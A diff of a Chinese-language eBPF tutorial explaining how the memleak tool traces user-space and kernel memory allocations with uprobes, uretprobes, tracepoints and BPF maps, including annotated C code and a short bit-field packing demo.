对于用户态的常用内存分配函数,如 malloccalloc 等,memleak 利用了用户态探测(uprobe)技术来实现监控。uprobe 是一种用于用户空间应用程序的动态追踪技术,它可以在运行时不修改二进制文件的情况下在任意位置设置断点,从而实现对特定函数调用的追踪。

+

对于内核态的内存分配函数,如 kmalloc 等,memleak 则选择使用 tracepoint 来实现监控。Tracepoint 是 Linux 内核中预先埋好的静态插桩点,可以在内核运行时按需动态开启,用来追踪特定的内核事件,而无需重新编译内核或加载内核模块。

+

内核态 eBPF 程序实现

+

memleak 内核态 eBPF 程序实现

+

memleak 的内核态 eBPF 程序包含一些用于跟踪内存分配和释放的关键函数。在我们深入了解这些函数之前,让我们首先观察 memleak 所定义的一些数据结构,这些结构在其内核态和用户态程序中均有使用。

+
#ifndef __MEMLEAK_H
+#define __MEMLEAK_H
 
-struct {
-	__uint(type, BPF_MAP_TYPE_HASH);
-	__type(key, u64); /* stack id */
-	__type(value, union combined_alloc_info);
-	__uint(max_entries, COMBINED_ALLOCS_MAX_ENTRIES);
-} combined_allocs SEC(".maps");
-
-struct {
-	__uint(type, BPF_MAP_TYPE_HASH);
-	__type(key, u64);
-	__type(value, u64);
-	__uint(max_entries, 10240);
-} memptrs SEC(".maps");
-
-struct {
-	__uint(type, BPF_MAP_TYPE_STACK_TRACE);
-	__type(key, u32);
-} stack_traces SEC(".maps"); 
+#define ALLOCS_MAX_ENTRIES 1000000
+#define COMBINED_ALLOCS_MAX_ENTRIES 10240
 
 struct alloc_info {
-	__u64 size;
-	__u64 timestamp_ns;
-	int stack_id;
+    __u64 size;            // 分配的内存大小
+    __u64 timestamp_ns;    // 分配时的时间戳,单位为纳秒
+    int stack_id;          // 分配时的调用堆栈ID
 };
 
 union combined_alloc_info {
-	struct {
-		__u64 total_size : 40;
-		__u64 number_of_allocs : 24;
-	};
-	__u64 bits;
+    struct {
+        __u64 total_size : 40;        // 所有未释放分配的总大小
+        __u64 number_of_allocs : 24;   // 所有未释放分配的总次数
+    };
+    __u64 bits;    // 结构的位图表示
 };
+
+#endif /* __MEMLEAK_H */
 
-

这段代码定义了memleak工具中使用的5个BPF Map:

-
    -
  • sizes用于记录程序中每个内存分配请求的大小;
  • -
  • allocs用于跟踪每个内存分配请求的详细信息,包括请求的大小、堆栈信息等;
  • -
  • combined_allocs的键是堆栈的唯一标识符(stack id),值是一个combined_alloc_info联合体,用于记录该堆栈的内存分配总大小和内存分配数量;
  • -
  • memptrs用于跟踪每个内存分配请求返回的指针,以便在内存释放请求到来时找到对应的内存分配请求;
  • -
  • stack_traces是一个堆栈跟踪类型的哈希表,用于存储每个线程的堆栈信息(key为线程id,value为堆栈跟踪信息)以便在内存分配和释放请求到来时能够追踪和分析相应的堆栈信息。
  • -
-

其中combined_alloc_info是一个联合体,其中包含一个结构体和一个unsigned long long类型的变量bits。结构体中的两个成员变量total_size和number_of_allocs分别表示总分配大小和分配的次数。其中40和24分别表示total_size和number_of_allocs这两个成员变量所占用的位数,用来限制其大小。通过这样的位数限制,可以节省combined_alloc_info结构的存储空间。同时,由于total_size和number_of_allocs在存储时是共用一个unsigned long long类型的变量bits,因此可以通过在成员变量bits上进行位运算来访问和修改total_size和number_of_allocs,从而避免了在程序中定义额外的变量和函数的复杂性。

-
static int gen_alloc_enter(size_t size)
-{
-	if (size < min_size || size > max_size)
-		return 0;
+

这里定义了两个主要的数据结构:alloc_infocombined_alloc_info

+

alloc_info 结构体包含了一个内存分配的基本信息,包括分配的内存大小 size、分配发生时的时间戳 timestamp_ns,以及触发分配的调用堆栈 ID stack_id

+

combined_alloc_info 是一个联合体(union),它包含一个嵌入的结构体和一个 __u64 类型的位图表示 bits。嵌入的结构体有两个成员:total_size 和 number_of_allocs,分别代表所有未释放分配的总大小和总次数,其中 40 和 24 分别是这两个位域所占用的位数。把两个计数打包进同一个 64 位变量 bits 之后,只需对 bits 做一次 64 位的读写或加减,就可以同时访问和修改 total_size 与 number_of_allocs;后面会看到,这使得 eBPF 程序能够用一条 __sync_fetch_and_add / __sync_fetch_and_sub 原子指令同时维护这两个统计值,而不需要额外的锁或辅助变量。
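为了更直观地理解这种打包方式,可以用一段普通的用户态 C 程序做个小实验(仅为示意,与 eBPF 运行环境无关):把一次“total_size=16、number_of_allocs=1”的增量打包进一个 64 位整数,再对 bits 做加法,就等价于同时更新了两个计数。

#include <stdio.h>
#include <stdint.h>

union combined_alloc_info {
    struct {
        uint64_t total_size : 40;       // 低 40 位:未释放分配的总大小
        uint64_t number_of_allocs : 24; // 高 24 位:未释放分配的总次数
    };
    uint64_t bits;
};

int main(void)
{
    union combined_alloc_info total = { .bits = 0 };
    const union combined_alloc_info inc = { .total_size = 16, .number_of_allocs = 1 };

    for (int i = 0; i < 10; i++)
        total.bits += inc.bits; // 对应 eBPF 中的 __sync_fetch_and_add(&existing->bits, inc.bits)

    printf("total_size=%llu number_of_allocs=%llu\n",
           (unsigned long long)total.total_size,
           (unsigned long long)total.number_of_allocs);
    // 输出:total_size=160 number_of_allocs=10
    return 0;
}

只要 total_size 不超出 40 位所能表示的范围,这一次 64 位加法就不会在两个位域之间产生进位干扰,这也是 memleak 能用一条原子指令同时维护两个统计值的前提。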

+

接下来,memleak 定义了一系列用于保存内存分配信息和分析结果的 eBPF 映射(maps)。这些映射都以 SEC(".maps") 的形式定义,表示它们属于 eBPF 程序的映射部分。

+
const volatile size_t min_size = 0;
+const volatile size_t max_size = -1;
+const volatile size_t page_size = 4096;
+const volatile __u64 sample_rate = 1;
+const volatile bool trace_all = false;
+const volatile __u64 stack_flags = 0;
+const volatile bool wa_missing_free = false;
 
-	if (sample_rate > 1) {
-		if (bpf_ktime_get_ns() % sample_rate != 0)
-			return 0;
-	}
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __type(key, pid_t);
+    __type(value, u64);
+    __uint(max_entries, 10240);
+} sizes SEC(".maps");
 
-	const pid_t pid = bpf_get_current_pid_tgid() >> 32;
-	bpf_map_update_elem(&sizes, &pid, &size, BPF_ANY);
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __type(key, u64); /* address */
+    __type(value, struct alloc_info);
+    __uint(max_entries, ALLOCS_MAX_ENTRIES);
+} allocs SEC(".maps");
 
-	if (trace_all)
-		bpf_printk("alloc entered, size = %lu\n", size);
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __type(key, u64); /* stack id */
+    __type(value, union combined_alloc_info);
+    __uint(max_entries, COMBINED_ALLOCS_MAX_ENTRIES);
+} combined_allocs SEC(".maps");
 
-	return 0;
-}
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __type(key, u64);
+    __type(value, u64);
+    __uint(max_entries, 10240);
+} memptrs SEC(".maps");
 
-SEC("uprobe")
+struct {
+    __uint(type, BPF_MAP_TYPE_STACK_TRACE);
+    __type(key, u32);
+} stack_traces SEC(".maps");
+
+static union combined_alloc_info initial_cinfo;
+
+

这段代码首先定义了一些可配置的参数,如 min_size, max_size, page_size, sample_rate, trace_all, stack_flagswa_missing_free,分别表示最小分配大小、最大分配大小、页面大小、采样率、是否追踪所有分配、堆栈标志和是否工作在缺失释放(missing free)模式。
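这些 const volatile 变量位于 BPF 对象的只读数据段(.rodata),其取值由用户态程序在打开骨架之后、加载之前写入。下面节选自本教程后面的用户态程序 memleak.c,展示了命令行参数是如何传给内核态程序的:

// 节选自 memleak.c:在 memleak_bpf__open() 之后、memleak_bpf__load() 之前执行
skel->rodata->min_size = env.min_size;
skel->rodata->max_size = env.max_size;
skel->rodata->page_size = env.page_size;
skel->rodata->sample_rate = env.sample_rate;
skel->rodata->trace_all = env.trace_all;
skel->rodata->stack_flags = env.kernel_trace ? 0 : BPF_F_USER_STACK;
skel->rodata->wa_missing_free = env.wa_missing_free;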

+

接着定义了五个映射:

+
    +
  1. sizes:这是一个哈希类型的映射,键为进程 ID,值为 u64 类型,存储每个进程的分配大小。
  2. allocs:这也是一个哈希类型的映射,键为分配的地址,值为 alloc_info 结构体,存储每个内存分配的详细信息。
  3. combined_allocs:这是另一个哈希类型的映射,键为堆栈 ID,值为 combined_alloc_info 联合体,存储所有未释放分配的总大小和总次数。
  4. memptrs:这也是一个哈希类型的映射,键和值都为 u64 类型,用于在用户空间和内核空间之间传递内存指针。
  5. stack_traces:这是一个堆栈追踪类型的映射,键为 u32 类型,用于存储堆栈 ID。
+

以用户态的内存分配追踪部分为例,主要是挂钩内存相关的函数调用,如 malloc, free, calloc, realloc, mmapmunmap,以便在调用这些函数时进行数据记录。在用户态,memleak 主要使用了 uprobes 技术进行挂载。

+

每个函数调用被分为 "enter" 和 "exit" 两部分。"enter" 部分记录的是函数调用的参数,如分配的大小或者释放的地址。"exit" 部分则主要用于获取函数的返回值,如分配得到的内存地址。

+

这里,gen_alloc_enter, gen_alloc_exit, gen_free_enter 是实现记录行为的函数,他们分别用于记录分配开始、分配结束和释放开始的相关信息。

+

函数原型示例如下:

+
SEC("uprobe")
 int BPF_KPROBE(malloc_enter, size_t size)
 {
-	return gen_alloc_enter(size);
-}
-
-

这个函数用于处理内存分配请求的进入事件。它会首先检查内存分配请求的大小是否在指定的范围内,如果不在范围内,则直接返回0表示不处理该事件。如果启用了采样率(sample_rate > 1),则该函数会采样内存分配请求的进入事件。如果当前时间戳不是采样周期的倍数,则也会直接返回0,表示不处理该事件。接下来,该函数会获取当前线程的PID并将其存储在pid变量中。然后,它会将当前线程的pid和请求的内存分配大小存储在sizes map中,以便后续收集和分析内存分配信息。如果开启了跟踪模式(trace_all),该函数会通过bpf_printk打印日志信息,以便用户实时监控内存分配的情况。

-

最后定义了BPF_KPROBE(malloc_enter, size_t size),它会在malloc函数被调用时被BPF uprobe拦截执行,并通过gen_alloc_enter来记录内存分配大小。

-
static void update_statistics_add(u64 stack_id, u64 sz)
-{
-	union combined_alloc_info *existing_cinfo;
-
-	existing_cinfo = bpf_map_lookup_or_try_init(&combined_allocs, &stack_id, &initial_cinfo);
-	if (!existing_cinfo)
-		return;
-
-	const union combined_alloc_info incremental_cinfo = {
-		.total_size = sz,
-		.number_of_allocs = 1
-	};
-
-	__sync_fetch_and_add(&existing_cinfo->bits, incremental_cinfo.bits);
-}
-static int gen_alloc_exit2(void *ctx, u64 address)
-{
-	const pid_t pid = bpf_get_current_pid_tgid() >> 32;
-	struct alloc_info info;
-
-	const u64* size = bpf_map_lookup_elem(&sizes, &pid);
-	if (!size)
-		return 0; // missed alloc entry
-
-	__builtin_memset(&info, 0, sizeof(info));
-
-	info.size = *size;
-	bpf_map_delete_elem(&sizes, &pid);
-
-	if (address != 0) {
-		info.timestamp_ns = bpf_ktime_get_ns();
-
-		info.stack_id = bpf_get_stackid(ctx, &stack_traces, stack_flags);
-
-		bpf_map_update_elem(&allocs, &address, &info, BPF_ANY);
-
-		update_statistics_add(info.stack_id, info.size);
-	}
-
-	if (trace_all) {
-		bpf_printk("alloc exited, size = %lu, result = %lx\n",
-				info.size, address);
-	}
-
-	return 0;
-}
-static int gen_alloc_exit(struct pt_regs *ctx)
-{
-	return gen_alloc_exit2(ctx, PT_REGS_RC(ctx));
+    // 记录分配开始的相关信息
+    return gen_alloc_enter(size);
 }
 
 SEC("uretprobe")
 int BPF_KRETPROBE(malloc_exit)
 {
-	return gen_alloc_exit(ctx);
-}
-
-

gen_alloc_exit2函数会在内存释放时被调用,它用来记录内存释放的信息,并更新相关的 map。具体地,它首先通过 bpf_get_current_pid_tgid 来获取当前进程的 PID,并将其右移32位,获得PID值,然后使用 bpf_map_lookup_elem 查找 sizes map 中与该 PID 相关联的内存分配大小信息,并将其赋值给 info.size。如果找不到相应的 entry,则返回 0,表示在内存分配时没有记录到该 PID 相关的信息。接着,它会调用 __builtin_memset 来将 info 的所有字段清零,并调用 bpf_map_delete_elem 来删除 sizes map 中与该 PID 相关联的 entry。

-

如果 address 不为 0,则说明存在相应的内存分配信息,此时它会调用 bpf_ktime_get_ns 来获取当前时间戳,并将其赋值给 info.timestamp_ns。然后,它会调用 bpf_get_stackid 来获取当前函数调用堆栈的 ID,并将其赋值给 info.stack_id。最后,它会调用 bpf_map_update_elem 来将 address 和 info 相关联,即将 address 映射到 info。随后,它会调用 update_statistics_add 函数来更新 combined_allocs map 中与 info.stack_id 相关联的内存分配信息。

-

最后,如果 trace_all 为真,则会调用 bpf_printk 打印相关的调试信息。

-

update_statistics_add函数的主要作用是更新内存分配的统计信息,其中参数stack_id是当前内存分配的堆栈ID,sz是当前内存分配的大小。该函数首先通过bpf_map_lookup_or_try_init函数在combined_allocs map中查找与当前堆栈ID相关联的combined_alloc_info结构体,如果找到了,则将新的分配大小和分配次数加入到已有的combined_alloc_info结构体中;如果未找到,则使用initial_cinfo初始化一个新的combined_alloc_info结构体,并添加到combined_allocs map中。

-

更新combined_alloc_info结构体的方法是使用__sync_fetch_and_add函数,原子地将incremental_cinfo中的值累加到existing_cinfo中的值中。通过这种方式,即使多个线程同时调用update_statistics_add函数,也可以保证计数的正确性。

-

在gen_alloc_exit函数中,将ctx参数传递给gen_alloc_exit2函数,并将它的返回值作为自己的返回值。这里使用了PT_REGS_RC宏获取函数返回值。

-

最后定义的BPF_KRETPROBE(malloc_exit)是一个kretprobe类型的函数,用于在malloc函数返回时执行。并调用gen_alloc_exit函数跟踪内存分配和释放的请求。

-
static void update_statistics_del(u64 stack_id, u64 sz)
-{
-	union combined_alloc_info *existing_cinfo;
-
-	existing_cinfo = bpf_map_lookup_elem(&combined_allocs, &stack_id);
-	if (!existing_cinfo) {
-		bpf_printk("failed to lookup combined allocs\n");
-
-		return;
-	}
-
-	const union combined_alloc_info decremental_cinfo = {
-		.total_size = sz,
-		.number_of_allocs = 1
-	};
-
-	__sync_fetch_and_sub(&existing_cinfo->bits, decremental_cinfo.bits);
-}
-
-static int gen_free_enter(const void *address)
-{
-	const u64 addr = (u64)address;
-
-	const struct alloc_info *info = bpf_map_lookup_elem(&allocs, &addr);
-	if (!info)
-		return 0;
-
-	bpf_map_delete_elem(&allocs, &addr);
-	update_statistics_del(info->stack_id, info->size);
-
-	if (trace_all) {
-		bpf_printk("free entered, address = %lx, size = %lu\n",
-				address, info->size);
-	}
-
-	return 0;
+    // 记录分配结束的相关信息
+    return gen_alloc_exit(ctx);
 }
 
 SEC("uprobe")
 int BPF_KPROBE(free_enter, void *address)
 {
-	return gen_free_enter(address);
+    // 记录释放开始的相关信息
+    return gen_free_enter(address);
 }
 
-

gen_free_enter函数接收一个地址参数,该函数首先使用allocs map查找该地址对应的内存分配信息。如果未找到,则表示该地址没有被分配,该函数返回0。如果找到了对应的内存分配信息,则使用bpf_map_delete_elem从allocs map中删除该信息。

-

接下来,调用update_statistics_del函数用于更新内存分配的统计信息,它接收堆栈ID和内存块大小作为参数。首先在combined_allocs map中查找堆栈ID对应的内存分配统计信息。如果没有找到,则输出一条日志,表示查找失败,并且函数直接返回。如果找到了对应的内存分配统计信息,则使用原子操作从内存分配统计信息中减去该内存块大小和1(表示减少了1个内存块)。这是因为堆栈ID对应的内存块数量减少了1,而堆栈ID对应的内存块总大小也减少了该内存块的大小。

-

最后定义了一个bpf程序BPF_KPROBE(free_enter, void *address)会在进程调用free函数时执行。它会接收参数address,表示正在释放的内存块的地址,并调用gen_free_enter函数来处理该内存块的释放。

+

其中,malloc_enterfree_enter 是分别挂载在 mallocfree 函数入口处的探针(probes),用于在函数调用时进行数据记录。而 malloc_exit 则是挂载在 malloc 函数的返回处的探针,用于记录函数的返回值。

+

这些函数使用了 BPF_KPROBEBPF_KRETPROBE 这两个宏来声明,这两个宏分别用于声明 kprobe(内核探针)和 kretprobe(内核返回探针)。具体来说,kprobe 用于在函数调用时触发,而 kretprobe 则是在函数返回时触发。

+

gen_alloc_enter 函数是在内存分配请求的开始时被调用的。这个函数主要负责在调用分配内存的函数时收集一些基本的信息。下面我们将深入探讨这个函数的实现。

+
static int gen_alloc_enter(size_t size)
+{
+    if (size < min_size || size > max_size)
+        return 0;
+
+    if (sample_rate > 1) {
+        if (bpf_ktime_get_ns() % sample_rate != 0)
+            return 0;
+    }
+
+    const pid_t pid = bpf_get_current_pid_tgid() >> 32;
+    bpf_map_update_elem(&sizes, &pid, &size, BPF_ANY);
+
+    if (trace_all)
+        bpf_printk("alloc entered, size = %lu\n", size);
+
+    return 0;
+}
+
+SEC("uprobe")
+int BPF_KPROBE(malloc_enter, size_t size)
+{
+    return gen_alloc_enter(size);
+}
+
+

首先,gen_alloc_enter 函数接收一个 size 参数,这个参数表示请求分配的内存的大小。如果这个值不在 min_sizemax_size 之间,函数将直接返回,不再进行后续的操作。这样可以使工具专注于追踪特定范围的内存分配请求,过滤掉不感兴趣的分配请求。

+

接下来,函数检查采样率 sample_rate。如果 sample_rate 大于1,意味着我们不需要追踪所有的内存分配请求,而是周期性地追踪。这里使用 bpf_ktime_get_ns 获取当前的时间戳,然后通过取模运算来决定是否需要追踪当前的内存分配请求。这是一种常见的采样技术,用于降低性能开销,同时还能够提供一个代表性的样本用于分析。

+

之后,函数使用 bpf_get_current_pid_tgid 函数获取当前进程的 PID。注意这里的 PID 实际上是进程和线程的组合 ID,我们通过右移 32 位来获取真正的进程 ID。
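换句话说,bpf_get_current_pid_tgid() 返回的 64 位值中,高 32 位是线程组 ID(即用户视角的进程 PID),低 32 位是线程 ID,可以按下面的方式拆开(示意代码):

u64 id = bpf_get_current_pid_tgid();
pid_t tgid = id >> 32;   // 线程组 ID,即本教程中作为键使用的“进程 PID”
pid_t tid  = (u32)id;    // 线程 ID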

+

函数接下来更新 sizes 这个 map,这个 map 以进程 ID 为键,以请求的内存分配大小为值。BPF_ANY 表示如果 key 已存在,那么更新 value,否则就新建一个条目。

+

最后,如果启用了 trace_all 标志,函数将打印一条信息,说明发生了内存分配。

+

BPF_KPROBE 宏用于声明探针的处理函数,并把被探测函数的参数以带类型的形式暴露出来;配合上面的 SEC("uprobe"),malloc_enter 就能直接拿到 malloc 的 size 参数。

+

最后定义了 BPF_KPROBE(malloc_enter, size_t size),它会在 malloc 函数被调用时被 BPF uprobe 拦截执行,并通过 gen_alloc_enter 来记录内存分配大小。 +我们刚刚分析了内存分配的入口函数 gen_alloc_enter,现在我们来关注这个过程的退出部分。具体来说,我们将讨论 gen_alloc_exit2 函数以及如何从内存分配调用中获取返回的内存地址。

+
static int gen_alloc_exit2(void *ctx, u64 address)
+{
+    const pid_t pid = bpf_get_current_pid_tgid() >> 32;
+    struct alloc_info info;
+
+    const u64* size = bpf_map_lookup_elem(&sizes, &pid);
+    if (!size)
+        return 0; // missed alloc entry
+
+    __builtin_memset(&info, 0, sizeof(info));
+
+    info.size = *size;
+    bpf_map_delete_elem(&sizes, &pid);
+
+    if (address != 0) {
+        info.timestamp_ns = bpf_ktime_get_ns();
+
+        info.stack_id = bpf_get_stackid(ctx, &stack_traces, stack_flags);
+
+        bpf_map_update_elem(&allocs, &address, &info, BPF_ANY);
+
+        update_statistics_add(info.stack_id, info.size);
+    }
+
+    if (trace_all) {
+        bpf_printk("alloc exited, size = %lu, result = %lx\n",
+                info.size, address);
+    }
+
+    return 0;
+}
+static int gen_alloc_exit(struct pt_regs *ctx)
+{
+    return gen_alloc_exit2(ctx, PT_REGS_RC(ctx));
+}
+
+SEC("uretprobe")
+int BPF_KRETPROBE(malloc_exit)
+{
+    return gen_alloc_exit(ctx);
+}
+
+

gen_alloc_exit2 函数在内存分配操作完成时被调用,这个函数接收两个参数,一个是上下文 ctx,另一个是内存分配函数返回的内存地址 address

+

首先,它获取当前线程的 PID,然后使用这个 PID 作为键在 sizes 这个 map 中查找对应的内存分配大小。如果没有找到(也就是说,没有对应的内存分配操作的入口),函数就会直接返回。

+

接着,函数清除 info 结构体的内容,并设置它的 size 字段为之前在 map 中找到的内存分配大小。并从 sizes 这个 map 中删除相应的元素,因为此时内存分配操作已经完成,不再需要这个信息。

+

接下来,如果 address 不为 0(也就是说,内存分配操作成功了),函数就会进一步收集一些额外的信息。首先,它获取当前的时间戳作为内存分配完成的时间,并获取当前的堆栈跟踪。这些信息都会被储存在 info 结构体中,并随后更新到 allocs 这个 map 中。

+

最后,函数调用 update_statistics_add 更新统计数据,如果启用了所有内存分配操作的跟踪,函数还会打印一些关于内存分配操作的信息。

+

请注意,gen_alloc_exit 函数是 gen_alloc_exit2 的一个包装,它将 PT_REGS_RC(ctx) 作为 address 参数传递给 gen_alloc_exit2在我们的讨论中,我们刚刚提到在gen_alloc_exit2函数中,调用了update_statistics_add` 函数以更新内存分配的统计数据。下面我们详细看一下这个函数的具体实现。

+
static void update_statistics_add(u64 stack_id, u64 sz)
+{
+    union combined_alloc_info *existing_cinfo;
+
+    existing_cinfo = bpf_map_lookup_or_try_init(&combined_allocs, &stack_id, &initial_cinfo);
+    if (!existing_cinfo)
+        return;
+
+    const union combined_alloc_info incremental_cinfo = {
+        .total_size = sz,
+        .number_of_allocs = 1
+    };
+
+    __sync_fetch_and_add(&existing_cinfo->bits, incremental_cinfo.bits);
+}
+
+

update_statistics_add 函数接收两个参数:当前的堆栈 ID stack_id 以及内存分配的大小 sz。这两个参数都在内存分配事件中收集到,并且用于更新内存分配的统计数据。

+

首先,函数尝试在 combined_allocs 这个 map 中查找键值为当前堆栈 ID 的元素,如果找不到,就用 initial_cinfo(这是一个默认的 combined_alloc_info 结构体,所有字段都为零)来初始化新的元素。
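这里的 bpf_map_lookup_or_try_init 并不是内核内置的 helper,而是本教程 maps.bpf.h 中封装的一个小函数:先查找,找不到就以 BPF_NOEXIST 方式插入初始值,再查找一次,从而在并发初始化同一个键时也能安全地拿到元素:

static __always_inline void *
bpf_map_lookup_or_try_init(void *map, const void *key, const void *init)
{
    void *val;
    long err;

    val = bpf_map_lookup_elem(map, key);
    if (val)
        return val;

    err = bpf_map_update_elem(map, key, init, BPF_NOEXIST);
    if (err && err != -EEXIST)
        return 0;

    return bpf_map_lookup_elem(map, key);
}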

+

接着,函数创建一个 incremental_cinfo,并设置它的 total_size 为当前内存分配的大小,设置 number_of_allocs 为 1。这是因为每次调用 update_statistics_add 函数都表示有一个新的内存分配事件发生,而这个事件的内存分配大小就是 sz

+

最后,函数使用 __sync_fetch_and_add 函数原子地将 incremental_cinfo 的值加到 existing_cinfo 中。请注意这个步骤是线程安全的,即使有多个线程并发地调用 update_statistics_add 函数,每个内存分配事件也能正确地记录到统计数据中。

+

总的来说,update_statistics_add 函数实现了内存分配统计的更新逻辑,通过维护每个堆栈 ID 的内存分配总量和次数,我们可以深入了解到程序的内存分配行为。 +在我们对内存分配的统计跟踪过程中,我们不仅要统计内存的分配,还要考虑内存的释放。在上述代码中,我们定义了一个名为 update_statistics_del 的函数,其作用是在内存释放时更新统计信息。而 gen_free_enter 函数则是在进程调用 free 函数时被执行。

+
static void update_statistics_del(u64 stack_id, u64 sz)
+{
+    union combined_alloc_info *existing_cinfo;
+
+    existing_cinfo = bpf_map_lookup_elem(&combined_allocs, &stack_id);
+    if (!existing_cinfo) {
+        bpf_printk("failed to lookup combined allocs\n");
+        return;
+    }
+
+    const union combined_alloc_info decremental_cinfo = {
+        .total_size = sz,
+        .number_of_allocs = 1
+    };
+
+    __sync_fetch_and_sub(&existing_cinfo->bits, decremental_cinfo.bits);
+}
+
+

update_statistics_del 函数的参数为堆栈 ID 和要释放的内存块大小。函数首先在 combined_allocs 这个 map 中使用当前的堆栈 ID 作为键来查找相应的 combined_alloc_info 结构体。如果找不到,就输出错误信息,然后函数返回。如果找到了,就会构造一个名为 decremental_cinfo 的 combined_alloc_info 结构体,设置它的 total_size 为要释放的内存大小,设置 number_of_allocs 为 1。然后使用 __sync_fetch_and_sub 函数原子地从 existing_cinfo 中减去 decremental_cinfo 的值。请注意,这里的 number_of_allocs 取值为 1,通过减法操作使未释放分配的计数减一,即表示减少了一个未释放的内存分配。

+
static int gen_free_enter(const void *address)
+{
+    const u64 addr = (u64)address;
+
+    const struct alloc_info *info = bpf_map_lookup_elem(&allocs, &addr);
+    if (!info)
+        return 0;
+
+    bpf_map_delete_elem(&allocs, &addr);
+    update_statistics_del(info->stack_id, info->size);
+
+    if (trace_all) {
+        bpf_printk("free entered, address = %lx, size = %lu\n",
+                address, info->size);
+    }
+
+    return 0;
+}
+
+SEC("uprobe")
+int BPF_KPROBE(free_enter, void *address)
+{
+    return gen_free_enter(address);
+}
+
+

接下来看 gen_free_enter 函数。它接收一个地址作为参数,这个地址是内存分配的结果,也就是将要释放的内存的起始地址。函数首先在 allocs 这个 map 中使用这个地址作为键来查找对应的 alloc_info 结构体。如果找不到,那么就直接返回,因为这意味着这个地址并没有被分配过。如果找到了,那么就删除这个元素,并且调用 update_statistics_del 函数来更新统计数据。最后,如果启用了全局追踪,那么还会输出一条信息,包括这个地址以及它的大小。 +在我们追踪和统计内存分配的同时,我们也需要对内核态的内存分配和释放进行追踪。在Linux内核中,kmem_cache_alloc函数和kfree函数分别用于内核态的内存分配和释放。

+
SEC("tracepoint/kmem/kfree")
+int memleak__kfree(void *ctx)
+{
+    const void *ptr;
+
+    if (has_kfree()) {
+        struct trace_event_raw_kfree___x *args = ctx;
+        ptr = BPF_CORE_READ(args, ptr);
+    } else {
+        struct trace_event_raw_kmem_free___x *args = ctx;
+        ptr = BPF_CORE_READ(args, ptr);
+    }
+
+    return gen_free_enter(ptr);
+}
+
+

上述代码片段定义了一个函数 memleak__kfree,这是一个 bpf 程序,会在内核触发 kfree 的 tracepoint 时执行。该函数首先通过 has_kfree() 判断当前内核使用的是较新的 trace_event_raw_kfree 事件格式,还是旧的 trace_event_raw_kmem_free 格式(内核提交 3544de8ee6e4 对其做了改名),然后按对应的格式读取要释放的内存块的地址,并保存到变量 ptr 中。接着,该函数会调用之前定义的 gen_free_enter 函数来处理该内存块的释放。
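这里的 has_kfree() 定义在本教程的 core_fixes.bpf.h 中,它通过 BTF 中是否存在新的 trace_event_raw_kfree 类型来判断内核使用的是哪种事件格式:

static __always_inline bool has_kfree()
{
    if (bpf_core_type_exists(struct trace_event_raw_kfree___x))
        return true;
    return false;
}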

+
SEC("tracepoint/kmem/kmem_cache_alloc")
+int memleak__kmem_cache_alloc(struct trace_event_raw_kmem_alloc *ctx)
+{
+    if (wa_missing_free)
+        gen_free_enter(ctx->ptr);
+
+    gen_alloc_enter(ctx->bytes_alloc);
+
+    return gen_alloc_exit2(ctx, (u64)(ctx->ptr));
+}
+
+

这段代码定义了一个函数 memleak__kmem_cache_alloc,这也是一个bpf程序,会在内核调用 kmem_cache_alloc 函数时执行。如果标记 wa_missing_free 被设置,则调用 gen_free_enter 函数处理可能遗漏的释放操作。然后,该函数会调用 gen_alloc_enter 函数来处理内存分配,最后调用gen_alloc_exit2函数记录分配的结果。

+

这两个 bpf 程序都使用了 SEC 宏定义了对应的 tracepoint,以便在相应的内核函数被调用时得到执行。在Linux内核中,tracepoint 是一种可以在内核中插入的静态钩子,可以用来收集运行时的内核信息,它在调试和性能分析中非常有用。

+

在理解这些代码的过程中,要注意 BPF_CORE_READ 宏的使用。这个宏用于在 bpf 程序中读取内核数据。在 bpf 程序中,我们不能直接访问内核内存,而需要使用这样的宏来安全地读取数据。
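例如,想在 eBPF 程序里沿着指针链安全地读出当前任务的父进程 PID,可以这样写(示意代码,real_parent、tgid 是内核 task_struct 中的字段):

struct task_struct *task = (struct task_struct *)bpf_get_current_task();
pid_t ppid = BPF_CORE_READ(task, real_parent, tgid); // 等价于安全地读取 task->real_parent->tgid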

+

用户态程序

+

在理解 BPF 内核部分之后,我们转到用户空间程序。用户空间程序与BPF内核程序紧密配合,它负责将BPF程序加载到内核,设置和管理BPF map,以及处理从BPF程序收集到的数据。用户态程序较长,我们这里可以简要参考一下它的挂载点。

+
int attach_uprobes(struct memleak_bpf *skel)
+{
+    ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter);
+    ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter);
+    ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, realloc, realloc_enter);
+    ATTACH_URETPROBE_CHECKED(skel, realloc, realloc_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, mmap, mmap_enter);
+    ATTACH_URETPROBE_CHECKED(skel, mmap, mmap_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, posix_memalign, posix_memalign_enter);
+    ATTACH_URETPROBE_CHECKED(skel, posix_memalign, posix_memalign_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, memalign, memalign_enter);
+    ATTACH_URETPROBE_CHECKED(skel, memalign, memalign_exit);
+
+    ATTACH_UPROBE_CHECKED(skel, free, free_enter);
+    ATTACH_UPROBE_CHECKED(skel, munmap, munmap_enter);
+
+    // the following probes are intentionally allowed to fail attachment
+
+    // deprecated in libc.so bionic
+    ATTACH_UPROBE(skel, valloc, valloc_enter);
+    ATTACH_URETPROBE(skel, valloc, valloc_exit);
+
+    // deprecated in libc.so bionic
+    ATTACH_UPROBE(skel, pvalloc, pvalloc_enter);
+    ATTACH_URETPROBE(skel, pvalloc, pvalloc_exit);
+
+    // added in C11
+    ATTACH_UPROBE(skel, aligned_alloc, aligned_alloc_enter);
+    ATTACH_URETPROBE(skel, aligned_alloc, aligned_alloc_exit);
+
+    return 0;
+}
+
+

在这段代码中,我们看到一个名为attach_uprobes的函数,该函数负责将uprobes(用户空间探测点)挂载到内存分配和释放函数上。在Linux中,uprobes是一种内核机制,可以在用户空间程序中的任意位置设置断点,这使得我们可以非常精确地观察和控制用户空间程序的行为。

+

这里,每个内存相关的函数都通过两个uprobes进行跟踪:一个在函数入口(enter),一个在函数退出(exit)。因此,每当这些函数被调用或返回时,都会触发一个uprobes事件,进而触发相应的BPF程序。

+

